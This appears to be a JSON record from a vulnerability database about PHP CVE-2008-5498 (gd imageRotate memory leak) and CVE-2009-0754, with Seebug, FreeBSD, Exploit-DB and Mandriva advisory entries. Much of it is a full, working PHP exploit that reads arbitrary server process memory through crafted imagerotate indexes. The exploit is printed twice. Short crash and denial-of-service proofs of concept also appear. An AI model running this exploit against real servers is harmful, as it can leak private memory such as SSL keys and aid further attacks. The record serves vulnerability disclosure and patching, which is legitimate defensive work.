\r\n\t$f_r = getDataFromImage( -$index_r ); \r\n\t$f_a = getDataFromImage( -$index_a ); \r\n\t$f_gR = getDataFromImage( -$index_gR ); \r\n\r\n\t/********************* Byte 1 **********************/ \r\n\r\n\t// b byte 1 \r\n\t$byte_b1 = $f_b & 0x000000ff; \r\n\tif( $debug ) \r\n\t\tprintf( "b:1-0x%x\\n", $byte_b1 ); \r\n\r\n\t//g byte 1 \r\n\t$byte_g1 = $f_g & 0x000000ff; \r\n\tif( $debug ) \r\n\t\tprintf( "g:1-0x%x\\n", $byte_g1 ); \r\n\r\n\t//r byte 1 \r\n\t$byte_r1 = $f_r& 0x000000ff; \r\n\tif( $debug ) \r\n\t\tprintf( "r:1-0x%x\\n", $byte_r1 ); \r\n\r\n\t//a byte 1 \r\n\t$byte_a1 = $f_a & 0x000000ff; \r\n\tif( $debug ) \r\n\t\tprintf( "a:1-0x%x\\n\\n", $byte_a1 ); \r\n \r\n\t/* Relative */ \r\n\r\n\t// gG byte 1 \r\n\t// this is relative g to `g`( suppose that 'g' is a b). so its right at the position of r. \r\n\t$byte_gG1 = $byte_r1; \r\n\r\n\t// gR byte 1 \r\n\t// this is relative r to `g`( suppose that 'g' is a b) \r\n\t$byte_gR1 = $f_gR & 0x000000ff; \r\n\r\n\t// rG byte 1 \r\n\t// this is relative g to r( suppose that 'r' is a b) \r\n\t$byte_rG1 = $byte_gR1; \r\n\r\n\t/* 2 Level Relative */ \r\n\r\n\t// gGg byte 1 \r\n\t// this is relative g to `gG`( suppose that 'gG' is a b) \r\n\t$byte_gGg1 = $byte_gR1; \r\n\r\n\t/********************* Byte 2 **********************/ \r\n\r\n\t// b byte 2 \r\n\t$sum_b2_g1 = (($f_b & 0x0000ff00) >> 8 ); \r\n\t$byte_b2 = $sum_b2_g1 - $byte_g1; \r\n\t$borrow_b2 = 0; \r\n\tif( $byte_b2 < 0 ) \r\n\t\t$borrow_b2 = 1; \r\n\t$byte_b2 = $byte_b2 & 0x000000ff; \r\n\tif( $debug ) \r\n\t\tprintf( "b:2-0x%x \\t0x%x\\n", $byte_b2, $f_b ); \r\n\r\n\t// g byte 2 \r\n\t$sum_g2_gG1 = (($f_g & 0x0000ff00) >> 8 ); \r\n\t$byte_g2 = $sum_g2_gG1 - $byte_gG1; \r\n\t$borrow_g2 = 0; \r\n\tif( $byte_g2 < 0 ) \r\n\t\t$borrow_g2 = 1; \r\n\t$byte_g2 = $byte_g2 & 0x000000ff; \r\n\tif( $debug ) \r\n\t\tprintf( "g:2-0x%x \\t0x%x\\n", $byte_g2, $f_gG1 ); \r\n\r\n\t// r byte 2 \r\n\t$sum_r2_rG1 = (($f_r& 0x0000ff00) >> 8 ); \r\n\t$byte_r2 = $sum_r2_rG1 - $byte_rG1; \r\n\t$byte_r2 = $byte_r2 & 0x000000ff; \r\n\tif( $debug ) \r\n\t\tprintf( "r:2-0x%x \\t0x%x\\n\\n", $byte_r2, $sum_r2_rG1 ); \r\n\r\n\t/* Relative */ \r\n\r\n\t// gG byte 2 \r\n\t$byte_gG2 = $byte_r2; \r\n\r\n\t/********************* Byte 3 **********************/ \r\n\r\n\t// b byte 3 \r\n\t$sum_b3_g2_r1_br2 = (($f_b & 0x00ff0000) >> 16 ); \r\n\t$sum_b3_g2_r1 = $sum_b3_g2_r1_br2 - $borrow_b2; \r\n\t$sum_b3_g2 = $sum_b3_g2_r1 - $byte_r1; \r\n\t$byte_b3 = $sum_b3_g2 - $byte_g2; \r\n\t$borrow_b3 = 0; \r\n\tif( $byte_b3 < 0 ) \r\n\t{ \r\n\t\t$borrow_b3 = (int)(-$byte_b3 / 0xff) + 1; // for borrows more than one \r\n\t\tif( $debug ) \r\n\t\t\tprintf( "\\nborrow was: %d\\n" , $borrow_b3 ); \r\n\t} \r\n\t$byte_b3 = $byte_b3 & 0x000000ff; \r\n\tif( $debug ) \r\n\t\tprintf( "b:3-0x%x \\t0x%x\\n", $byte_b3, $sum_b3_g2 ); \r\n\r\n\t// g byte 3 \r\n\t$sum_g3_gG2_gR1_br2 = (($f_g & 0x00ff0000) >> 16 ); \r\n\t$sum_g3_gG2_gR1 = $sum_g3_gG2_gR1_br2 - $borrow_g2; \r\n\t$sum_g3_gG2 = $sum_g3_gG2_gR1 - $byte_gR1; \r\n\t$byte_g3 = $sum_g3_gG2 - $byte_gG2; \r\n\t$byte_g3 = $byte_g3 & 0x000000ff; \r\n\tif( $debug ) { \r\n\t\tprintf( "f_g: 0x%x\\n" , $f_g); \r\n\t\tprintf( "sum_g3_gG2_gR1_br2: 0x%x\\n" , $sum_g3_gG2_gR1_br2 ); \r\n\t\tprintf( "sum_g3_gG2_gR1: 0x%x\\n" , $sum_g3_gG2_gR1 ); \r\n\t\tprintf( "sum_g3_gG2: 0x%x\\n" , $sum_g3_gG2 ); \r\n\t\tprintf( "g:3-0x%x \\t0x%x\\n\\n", $byte_g3, $sum_b3_g2 ); \r\n\t} \r\n\r\n\t/********************* Byte 4 **********************/ \r\n\r\n\t// b byte 4 \r\n\t$sum_b4_g3_r2_a1_br3 = (($f_b & 0xff000000) >> 24 ); \r\n\t$sum_b4_g3_r2_a1 = $sum_b4_g3_r2_a1_br3 - $borrow_b3; \r\n\t$sum_b4_g3_r2 = $sum_b4_g3_r2_a1 - $byte_a1; \r\n\t$sum_b4_g3 = $sum_b4_g3_r2 - $byte_r2; \r\n\t$byte_b4 = $sum_b4_g3 - $byte_g3; \r\n\t$byte_b4 = $byte_b4 & 0x000000ff; \r\n\tif( $debug ) { \r\n\t\tprintf( "f_b: 0x%x\\n" , $f_b); \r\n\t\tprintf( "sum_b4_g3_r2_a1_br3: 0x%x\\n" , $sum_b4_g3_r2_a1_br3 ); \r\n\t\tprintf( "sum_b4_g3_r2_a1: 0x%x\\n" , $sum_b4_g3_r2_a1 ); \r\n\t\tprintf( "sum_b4_g3_r2: 0x%x\\n" , $sum_b4_g3_r2 ); \r\n\t\tprintf( "sum_b4_g3: 0x%x\\n" , $sum_b4_g3 ); \r\n\t\tprintf( "b:4-0x%x\\n\\n", $byte_b4); \r\n\t} \r\n\t/********************* Byte **********************/ \r\n\r\n\tif($mode == 0) { //text mode \r\n\t\tprintf( "%c%c%c%c", $byte_b1, $byte_b2, $byte_b3, $byte_b4); \r\n\t} elseif( $mode == 1) { \r\n\t\t// b \r\n\t\tif( !$eor ) \r\n\t\t\tprintf( "0x%x:\\t", $address ); \r\n\t\tprintf( "0x%x(%c)\\t0x%x(%c)\\t0x%x(%c)\\t0x%x(%c)\\t", $byte_b1, $byte_b1, \r\n\t\t\t\t\t\t\t\t\t\t $byte_b2, $byte_b2, \r\n\t\t\t\t\t\t\t\t\t\t $byte_b3, $byte_b3, \r\n\t\t\t\t\t\t\t\t\t\t $byte_b4, $byte_b4 ); \r\n\r\n\t\t$eor = !$eor; \r\n\t\tif( !$eor ) \r\n\t\t\techo "\\n"; \r\n\t} else { \r\n\t\t$val = ($byte_b4 << 24) + ($byte_b3 << 16) + ($byte_b2 << 8) + $byte_b1; \r\n\t\tprintf( "0x%x: 0x%x\\n", $address, $val ); \r\n\t} \r\n\t$address+=4; \r\n} \r\n?> \r\n \r\nCredit\r\nThis vulnerability has been discovered by Hamid Ebadi from Amirkabir University of Technology APA laboratory.\r\nautcert@aut.ac.ir\r\nhttps://www.ircert.cc\r\n\r\nDisclosure: October 2008\r\nReport to vendor: December, 10, 2008\r\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-10377"}, {"lastseen": "2017-11-19T18:16:43", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 33542\r\nCVE ID: CVE-2009-0754\r\n\r\nPHP\u662f\u5e7f\u6cdb\u4f7f\u7528\u7684\u901a\u7528\u76ee\u7684\u811a\u672c\u8bed\u8a00\uff0c\u7279\u522b\u9002\u5408\u4e8eWeb\u5f00\u53d1\uff0c\u53ef\u5d4c\u5165\u5230HTML\u4e2d\u3002 \r\n\r\n\u8fd0\u884c\u5728Apache\u4e0a\u7684PHP\u5141\u8bb8\u672c\u5730\u7528\u6237\u901a\u8fc7\u4fee\u6539.htaccess\u4e2d\u7684mbstring.func_overload\u8bbe\u7f6e\u6765\u4fee\u6539\u540c\u4e00Web\u670d\u52a1\u5668\u4e0a\u6240\u627f\u8f7d\u7684\u5176\u4ed6\u7ad9\u70b9\u7684\u884c\u4e3a\uff0c\u5c06\u8bbe\u7f6e\u5e94\u7528\u5230\u540c\u4e00\u670d\u52a1\u5668\u7684\u5176\u4ed6\u865a\u62df\u4e3b\u673a\uff0c\u5bfc\u81f4\u65e0\u6cd5\u6b63\u786e\u7684\u5904\u7406\u591a\u5b57\u8282\u5b57\u7b26\u4e32\u3002\n\nPHP PHP 5.1.6\r\nPHP PHP 4.4.4\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nPHP\r\n---\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://snaps.php.net/\r\n\r\nRedHat\r\n------\r\nRedHat\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08Moderate: php security update\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nModerate: php security update\uff1aModerate: php security update\r\n\u94fe\u63a5\uff1ahttps://www.redhat.com/support/errata/Moderate-Moderate:.html\r\n\r\nGentoo\r\n------\r\nGentoo\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08GLSA 201001-03\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nGLSA 201001-03\uff1aPHP: Multiple vulnerabilities\r\n\u94fe\u63a5\uff1ahttp://security.gentoo.org/glsa/201001-03.xml", "modified": "2010-01-08T00:00:00", "published": "2010-01-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15209", "id": "SSV:15209", "title": "PHP mbstring.func_overload Webserver\u672c\u5730\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": ""}], "freebsd": [{"lastseen": "2018-08-31T01:15:29", "bulletinFamily": "unix", "description": "\nAccording to CVE-2008-5498 entry:\n\nArray index error in the \"imageRotate\" function in PHP 5.2.8 and\n\t earlier allows context-dependent attackers to read the contents\n\t of arbitrary memory locations via a crafted value of the third\n\t argument (aka the \"bgd_color\" or \"clrBack\" argument) for an indexed\n\t image.\n\n", "modified": "2009-02-04T00:00:00", "published": "2008-12-24T00:00:00", "id": "58A3C266-DB01-11DD-AE30-001CC0377035", "href": "https://vuxml.freebsd.org/freebsd/58a3c266-db01-11dd-ae30-001cc0377035.html", "title": "php5-gd -- uninitialized memory information disclosure vulnerability", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-02-01T03:40:50", "bulletinFamily": "exploit", "description": "PHP <= 5.2.8 gd library - imageRotate() Information Leak Vulnerability. CVE-2008-5498. Local exploits for multiple platform", "modified": "2009-01-02T00:00:00", "published": "2009-01-02T00:00:00", "id": "EDB-ID:7646", "href": "https://www.exploit-db.com/exploits/7646/", "type": "exploitdb", "title": "PHP <= 5.2.8 gd library - imageRotate Information Leak Vulnerability", "sourceData": "PHP - gd library - imageRotate()function Information Leak Vulnerability\n\nDiscovered by: Hamid Ebadi, \nFurther research and exploit: Mohammad R. Roohian\nCSIRT Team Members\nAmirkabir University APA Laboratory\n\nIntroduction\nPHP is a popular web programming language which isnormally used as a script engine in the server side.\nPHP 5 which is compiledwith gd library, includes a function called imageRotate() for rotating an imageresource by giving the rotation angle.\nThis function fills the resulted emptyareas with a given default coloring after rotation (clrBack). \nGd library works with both indexed images andtruecolor images. A truecolor pixel is a DWORD which stores the color value ofthe pixel which would be displayed without any change.\nIn indexed mode by using an index with a sizeof no more than 1 byte, the data wouldbe fetched from a color palette which consists of parallel arrays of colorbytes. The gd library uses the same data strcture for both of these image types(gdImageStruct).\nAn implementation error can cause information leakage from thememory of the PHP (or possible the web server) process.\n\nInformation leak vulnerabilities allow access to e.g. the Apache memory which might contain the private RSA key for the SSL cert.If an attacker is able to read it he can perform real man in the middle attackson all SSL connections. Aside from this in the days of ASLR, NX and canaryprotections it is often vital for the success of the exploit to know exactmemory addresses. (http://www.php-security.org/)\n\nVulnerableversion\nPHP <= 5.2.8\nCVE Candidate Number: CVE-2008-5498\n\nVulnerability\nThe imageRotate() function does not perform any validation check on the clrBack parameter which is used as an index for the above mentioned arrays with the size of 255 in the index image type.\nA correct validation check for the indexed images could be:\n\nfile: php-x.y.z/ext/gd/libgd/gd.c\n\n3129: gdImagePtr gdImageRotate (gdImagePtrsrc, double dAngle,\n int clrBack, int ignoretransparent) \n3130:{ \n3131: gdImagePtrpMidImg; \n3132: gdImagePtrrotatedImg;\n3133:\n3134: if(src == NULL) { \n3135: returnNULL; \n3136: }\n3137:+\n3137:+ // Index check\n3137:+ if (!src->truecolor) \n3137:+ clrBack &= 0xff; // Just keep the first byte\n3137:+\n3138: if(!gdImageTrueColor(src) && clrBack>=gdImageColorsTotal(src)) { \n3139: returnNULL; \n3140: }\n\nWhile rotating indexed image, gd retrives the final backcolor from 4 parallel arrays(red, green, blue and alpha) with length of 255 and uses clrBack as the indexof these arrays.\nBy providing a special clrBack value (more than 255) we can read almost any address in php memory:\n\nfile: php-x.y.z/ext/gd/libgd/gd.h\n\ntypedef struct gdImageStruct { \n \n --snip snip -- \n \n intred[gdMaxColors]; \n intgreen[gdMaxColors]; \n intblue[gdMaxColors]; \n \n --snip snip -- \n \n intalpha[gdMaxColors]; \n /*Truecolor flag and pixels. New 2.0 fields appear here at the \n endto minimize breakage of existing object code. */ \n inttrueColor; \n \n --snip snip -- \n \n} gdImage; \n\ntypedef gdImage * gdImagePtr; \n\nthen uses gdTrueColorAlpha macro to combinethe 4 mentioned values. gdTrueColorAlpha macro is implemented as following: \n\nfile: php-x.y.z/ext/gd/libgd/gd.h\n\n#define gdTrueColorAlpha(r, g, b, a) (((a)<< 24) + \\\n ((r)<< 16) + \\\n ((g)<< 8) + \\\n (b))\n\nThe final color value is the output of gdTrueColorAlpha macro which will be used as background color. gdTrueColorAlpha uses '+' (add) instead of '&'(and). While the '+' operator is slower, it also causes a security issue. By using a reverse function we can calculate almost any desired memory address.\n\nProof of concept:\nThis script would cause a segmentation faultbecause -9999999 would result in reading an invalid memory address in PHP process:\n\n<?php\n\n$img = imagecreate(5,5);\n$tmp = imagerotate ($img,5,-9999999);\n\n?>\nExploitation :\nWe need to provide a good clrBack to imageRotate()and then calculate the value of desired memory address by using imagecolorat() with arguments concerned with angles of the rotated image. Upper right would be a good spot (0, 0):\n\n<?php \n&special_index = /* index of the$address */\n$r=imagecreate(300,300); \n$gray = imagecolorallocate( $r,111,111,111); \nimagefilledrectangle($r,0,0,300,300,$gray);\n$tmp =imagerotate( $r, 30,&special_index ); \nimagePng( $tmp, \"test.png\" ); \n?>\n\n\n --------\n|f_b/\\\t |\n| / \\\t |\n| / \\ |\n|/image\t\\|\n|\\ /|\n| \\ / |\n| \\ /\t |\n| \\/\t |\n --------\n\nTo read encoded memory values from a desired address, we have to use the following script:\n\n<?php\n\n$address = /*address to read should bemultiply of 4 */\n$src = 0x84cde2c; \n// depends on the image size and phpscript length but is constant\n$index_b = -(int)(($src - $address +0x810)/4);\n\n$img = imagecreate(5,5);\n$tmp = imagerotate ($img,5,$index_b);\n$f_b = imagecolorat( $tmp,0,0);\n\n?>\n\nAfter passing $index_b as the index of arrays (red, green, blue and alphaarrays) and rotating $img (so that the values from the memory would be read), b variable takes the value of $address.\nThe color at [0,0] would be filled by back color,thus $f_b has the return value of gdTrueColorAlpha function. All we need to do is decoding its value. The final value of $f_b is calculated as following:\n$f_b = gdTrueColorAlpha( M[$address-512],\n M[$address-255],\n M[$address+0],\n M[$address+1034]);\n\nThese offsets [-512, -255, 0, 1034] are the displacements in gdImageStruct's arrays.\nDecoding $f_b\nAs you can see in the source code $f_b is calculated like this:\n----------------------------------------------------------\na\t:A4\tA3\tA2\tA1\nr\t:\tR4\tR3\tR2\tR1\ng\t:\t\tG4\tG3\tG2\tG1\nb\t:\t\t\tB4\tB3\tB2\tB1\n----------------------------------------------------------\n$f_b\t:\t\t\tF4\tF3\tF2\tF1\n----------------------------------------------------------\n\nWe have used a special $index_b in order that b would have the value of memory address at $address. All we need to do is extracting b from $f_b. It is obvious that F1 has the exact value of B1( first byte of memory at $address location). To extract B2 we must have G1 values and use this equation: B2 = F2 \u0102\u0082\u00e2\u0080\u0093 G1. \nTo calculate B3 and B4 we will also need G2, G3, R1, R2, A1. These bytes values can also be grabbed by using imagerotate function and sending special indexes other than $index_b. For more information see the comments in exploit source code.\n\n\n\nExploit: \n<?php \n/* \nedi = src \nesi = clrBack ( -205923 for core_globals safe mode ( 0x IF APR SM MQS) sample: 0x01 00 SM 00 ) \n\n( \n\tzend_bool magic_quotes_sybase;\t\t\tMQS \n\tzend_bool safe_mode;\t\t\t\tSM \n\tzend_bool allow_call_time_pass_reference;\t\tAPR \n\tzend_bool implicit_flush;\t\t\t\tIF \n) \n\n0x080ed27f <php_gd_gdImageSkewX+1135>: mov 0x10(%edi,%esi,4),%ebx \nmov ebx, [edi+esi*4+10] \n\ntest case: \nedi = 0x084c6128 \nesi = 0xffee07b1(-1177679) values less than this will crash. \n=> \nebx = 0x8047ff6 \n\nif (a>127) { \n\ta = 127; \n} \n:( since alpha blending is on by default, the 32th bit of dumped address cant be detected. \n*/ \n$debug = 0; \n$address = hexdec($argv[1]); \n$addressSave = $address; \n$count = $argv[3]+1; \n$mode = $argv[2]; \n$src = 0x84cde2c; \n$s = 10; //image size \n\n$GLOBALS[\"image\"]=imagecreate($s,$s); \n$r = $GLOBALS[\"image\"]; \nif( $debug ) \n\techo \"Image created.\\n\"; \n\nfunction getDataFromImage( $index ) { \n\t$tmp = imagerotate ($GLOBALS[\"image\"],5,$index); \n\treturn imagecolorat( $tmp, 0,0); \n} \n\n$eor = 0; \nwhile( $address < $addressSave+$count*4 ) { \n\t// indexes \n\t$index_b = (int)(($src - $address + 0x810)/4); \n\t$index_g = $index_b + 256; \n\t$index_r = $index_b + 512; \n\t$index_a = $index_b - 1034; \n\t//$index_gG is the same as index of r \n\t$index_gR = $index_g + 512; \n\t//$index_rG is the same as index of gR \n\t//$index_gGg is the same as index of gR \n\n\t// fuctions \n\t$f_b = getDataFromImage( -$index_b ); \n\t$f_g = getDataFromImage( -$index_g ); \n\t$f_r = getDataFromImage( -$index_r ); \n\t$f_a = getDataFromImage( -$index_a ); \n\t$f_gR = getDataFromImage( -$index_gR ); \n\n\t/********************* Byte 1 **********************/ \n\n\t// b byte 1 \n\t$byte_b1 = $f_b & 0x000000ff; \n\tif( $debug ) \n\t\tprintf( \"b:1-0x%x\\n\", $byte_b1 ); \n\n\t//g byte 1 \n\t$byte_g1 = $f_g & 0x000000ff; \n\tif( $debug ) \n\t\tprintf( \"g:1-0x%x\\n\", $byte_g1 ); \n\n\t//r byte 1 \n\t$byte_r1 = $f_r& 0x000000ff; \n\tif( $debug ) \n\t\tprintf( \"r:1-0x%x\\n\", $byte_r1 ); \n\n\t//a byte 1 \n\t$byte_a1 = $f_a & 0x000000ff; \n\tif( $debug ) \n\t\tprintf( \"a:1-0x%x\\n\\n\", $byte_a1 ); \n \n\t/* Relative */ \n\n\t// gG byte 1 \n\t// this is relative g to `g`( suppose that 'g' is a b). so its right at the position of r. \n\t$byte_gG1 = $byte_r1; \n\n\t// gR byte 1 \n\t// this is relative r to `g`( suppose that 'g' is a b) \n\t$byte_gR1 = $f_gR & 0x000000ff; \n\n\t// rG byte 1 \n\t// this is relative g to r( suppose that 'r' is a b) \n\t$byte_rG1 = $byte_gR1; \n\n\t/* 2 Level Relative */ \n\n\t// gGg byte 1 \n\t// this is relative g to `gG`( suppose that 'gG' is a b) \n\t$byte_gGg1 = $byte_gR1; \n\n\t/********************* Byte 2 **********************/ \n\n\t// b byte 2 \n\t$sum_b2_g1 = (($f_b & 0x0000ff00) >> 8 ); \n\t$byte_b2 = $sum_b2_g1 - $byte_g1; \n\t$borrow_b2 = 0; \n\tif( $byte_b2 < 0 ) \n\t\t$borrow_b2 = 1; \n\t$byte_b2 = $byte_b2 & 0x000000ff; \n\tif( $debug ) \n\t\tprintf( \"b:2-0x%x \\t0x%x\\n\", $byte_b2, $f_b ); \n\n\t// g byte 2 \n\t$sum_g2_gG1 = (($f_g & 0x0000ff00) >> 8 ); \n\t$byte_g2 = $sum_g2_gG1 - $byte_gG1; \n\t$borrow_g2 = 0; \n\tif( $byte_g2 < 0 ) \n\t\t$borrow_g2 = 1; \n\t$byte_g2 = $byte_g2 & 0x000000ff; \n\tif( $debug ) \n\t\tprintf( \"g:2-0x%x \\t0x%x\\n\", $byte_g2, $f_gG1 ); \n\n\t// r byte 2 \n\t$sum_r2_rG1 = (($f_r& 0x0000ff00) >> 8 ); \n\t$byte_r2 = $sum_r2_rG1 - $byte_rG1; \n\t$byte_r2 = $byte_r2 & 0x000000ff; \n\tif( $debug ) \n\t\tprintf( \"r:2-0x%x \\t0x%x\\n\\n\", $byte_r2, $sum_r2_rG1 ); \n\n\t/* Relative */ \n\n\t// gG byte 2 \n\t$byte_gG2 = $byte_r2; \n\n\t/********************* Byte 3 **********************/ \n\n\t// b byte 3 \n\t$sum_b3_g2_r1_br2 = (($f_b & 0x00ff0000) >> 16 ); \n\t$sum_b3_g2_r1 = $sum_b3_g2_r1_br2 - $borrow_b2; \n\t$sum_b3_g2 = $sum_b3_g2_r1 - $byte_r1; \n\t$byte_b3 = $sum_b3_g2 - $byte_g2; \n\t$borrow_b3 = 0; \n\tif( $byte_b3 < 0 ) \n\t{ \n\t\t$borrow_b3 = (int)(-$byte_b3 / 0xff) + 1; // for borrows more than one \n\t\tif( $debug ) \n\t\t\tprintf( \"\\nborrow was: %d\\n\" , $borrow_b3 ); \n\t} \n\t$byte_b3 = $byte_b3 & 0x000000ff; \n\tif( $debug ) \n\t\tprintf( \"b:3-0x%x \\t0x%x\\n\", $byte_b3, $sum_b3_g2 ); \n\n\t// g byte 3 \n\t$sum_g3_gG2_gR1_br2 = (($f_g & 0x00ff0000) >> 16 ); \n\t$sum_g3_gG2_gR1 = $sum_g3_gG2_gR1_br2 - $borrow_g2; \n\t$sum_g3_gG2 = $sum_g3_gG2_gR1 - $byte_gR1; \n\t$byte_g3 = $sum_g3_gG2 - $byte_gG2; \n\t$byte_g3 = $byte_g3 & 0x000000ff; \n\tif( $debug ) { \n\t\tprintf( \"f_g: 0x%x\\n\" , $f_g); \n\t\tprintf( \"sum_g3_gG2_gR1_br2: 0x%x\\n\" , $sum_g3_gG2_gR1_br2 ); \n\t\tprintf( \"sum_g3_gG2_gR1: 0x%x\\n\" , $sum_g3_gG2_gR1 ); \n\t\tprintf( \"sum_g3_gG2: 0x%x\\n\" , $sum_g3_gG2 ); \n\t\tprintf( \"g:3-0x%x \\t0x%x\\n\\n\", $byte_g3, $sum_b3_g2 ); \n\t} \n\n\t/********************* Byte 4 **********************/ \n\n\t// b byte 4 \n\t$sum_b4_g3_r2_a1_br3 = (($f_b & 0xff000000) >> 24 ); \n\t$sum_b4_g3_r2_a1 = $sum_b4_g3_r2_a1_br3 - $borrow_b3; \n\t$sum_b4_g3_r2 = $sum_b4_g3_r2_a1 - $byte_a1; \n\t$sum_b4_g3 = $sum_b4_g3_r2 - $byte_r2; \n\t$byte_b4 = $sum_b4_g3 - $byte_g3; \n\t$byte_b4 = $byte_b4 & 0x000000ff; \n\tif( $debug ) { \n\t\tprintf( \"f_b: 0x%x\\n\" , $f_b); \n\t\tprintf( \"sum_b4_g3_r2_a1_br3: 0x%x\\n\" , $sum_b4_g3_r2_a1_br3 ); \n\t\tprintf( \"sum_b4_g3_r2_a1: 0x%x\\n\" , $sum_b4_g3_r2_a1 ); \n\t\tprintf( \"sum_b4_g3_r2: 0x%x\\n\" , $sum_b4_g3_r2 ); \n\t\tprintf( \"sum_b4_g3: 0x%x\\n\" , $sum_b4_g3 ); \n\t\tprintf( \"b:4-0x%x\\n\\n\", $byte_b4); \n\t} \n\t/********************* Byte **********************/ \n\n\tif($mode == 0) { //text mode \n\t\tprintf( \"%c%c%c%c\", $byte_b1, $byte_b2, $byte_b3, $byte_b4); \n\t} elseif( $mode == 1) { \n\t\t// b \n\t\tif( !$eor ) \n\t\t\tprintf( \"0x%x:\\t\", $address ); \n\t\tprintf( \"0x%x(%c)\\t0x%x(%c)\\t0x%x(%c)\\t0x%x(%c)\\t\", $byte_b1, $byte_b1, \n\t\t\t\t\t\t\t\t\t\t $byte_b2, $byte_b2, \n\t\t\t\t\t\t\t\t\t\t $byte_b3, $byte_b3, \n\t\t\t\t\t\t\t\t\t\t $byte_b4, $byte_b4 ); \n\n\t\t$eor = !$eor; \n\t\tif( !$eor ) \n\t\t\techo \"\\n\"; \n\t} else { \n\t\t$val = ($byte_b4 << 24) + ($byte_b3 << 16) + ($byte_b2 << 8) + $byte_b1; \n\t\tprintf( \"0x%x: 0x%x\\n\", $address, $val ); \n\t} \n\t$address+=4; \n} \n?> \n \nCredit\nThis vulnerability has been discovered by Hamid Ebadi from Amirkabir University of Technology APA laboratory.\nautcert@aut.ac.ir\nhttps://www.ircert.cc\n\nDisclosure: October 2008\nReport to vendor: December, 10, 2008\n\n# milw0rm.com [2009-01-02]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/7646/"}, {"lastseen": "2016-02-03T17:45:47", "bulletinFamily": "exploit", "description": "PHP 5.2.5 'mbstring.func_overload' Webserver Denial Of Service Vulnerability. CVE-2009-0754. Dos exploit for php platform", "modified": "2009-01-30T00:00:00", "published": "2009-01-30T00:00:00", "id": "EDB-ID:32769", "href": "https://www.exploit-db.com/exploits/32769/", "type": "exploitdb", "title": "PHP 5.2.5 - 'mbstring.func_overload' Webserver Denial Of Service Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/33542/info\r\n\r\nPHP is prone to a denial-of-service vulnerability because it fails to limit global scope for certain settings relating to Unicode text operations.\r\n\r\nAttackers can exploit this issue to crash the affected webserver, denying service to legitimate users. \r\n\r\n<?php\r\n $v = '\u00d2\u00ee\u00e2\u00e0 \u00e5 \u00f2\u00e5\u00f1\u00f2|test.php';\r\n print substr($v,0,strpos($v,'|'));\r\n?>", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/32769/"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:32", "bulletinFamily": "software", "description": "mbstring.func_overload setting in .htaccess is applied to all websites.", "modified": "2009-03-06T00:00:00", "published": "2009-03-06T00:00:00", "id": "SECURITYVULNS:VULN:9711", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9711", "title": "PHP unauthorized access", "type": "securityvulns", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:29", "bulletinFamily": "software", "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2009:066\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n\r\n Package : php\r\n Date : March 5, 2009\r\n Affected: 2008.0, 2008.1, 2009.0, Corporate 4.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n PHP 4.4.4, 5.1.6, and other versions, when running on Apache, allows\r\n local users to modify behavior of other sites hosted on the same\r\n web server by modifying the mbstring.func_overload setting within\r\n .htaccess, which causes this setting to be applied to other virtual\r\n hosts on the same server (CVE-2009-0754).\r\n \r\n The updated packages have been patched to correct these issues.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0754\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Linux 2008.0:\r\n 6817b7fc8cecb169e0d76a138517f09b 2008.0/i586/libphp5_common5-5.2.4-3.5mdv2008.0.i586.rpm\r\n f484adb8d06c538cbe2a05b2dda13660 2008.0/i586/php-bcmath-5.2.4-3.5mdv2008.0.i586.rpm\r\n 20d672144688deca9c042de5c435d91d 2008.0/i586/php-bz2-5.2.4-3.5mdv2008.0.i586.rpm\r\n b6d95c8fdc4ac65642711b65a35baf73 2008.0/i586/php-calendar-5.2.4-3.5mdv2008.0.i586.rpm\r\n e78ff4e9aeaa54a919dff7cc9ade7e8d 2008.0/i586/php-cgi-5.2.4-3.5mdv2008.0.i586.rpm\r\n 4cbe8f23c20839d9beb07db50c484d8c 2008.0/i586/php-cli-5.2.4-3.5mdv2008.0.i586.rpm\r\n c62c71bf6178eb7e317365f25bb51101 2008.0/i586/php-ctype-5.2.4-3.5mdv2008.0.i586.rpm\r\n 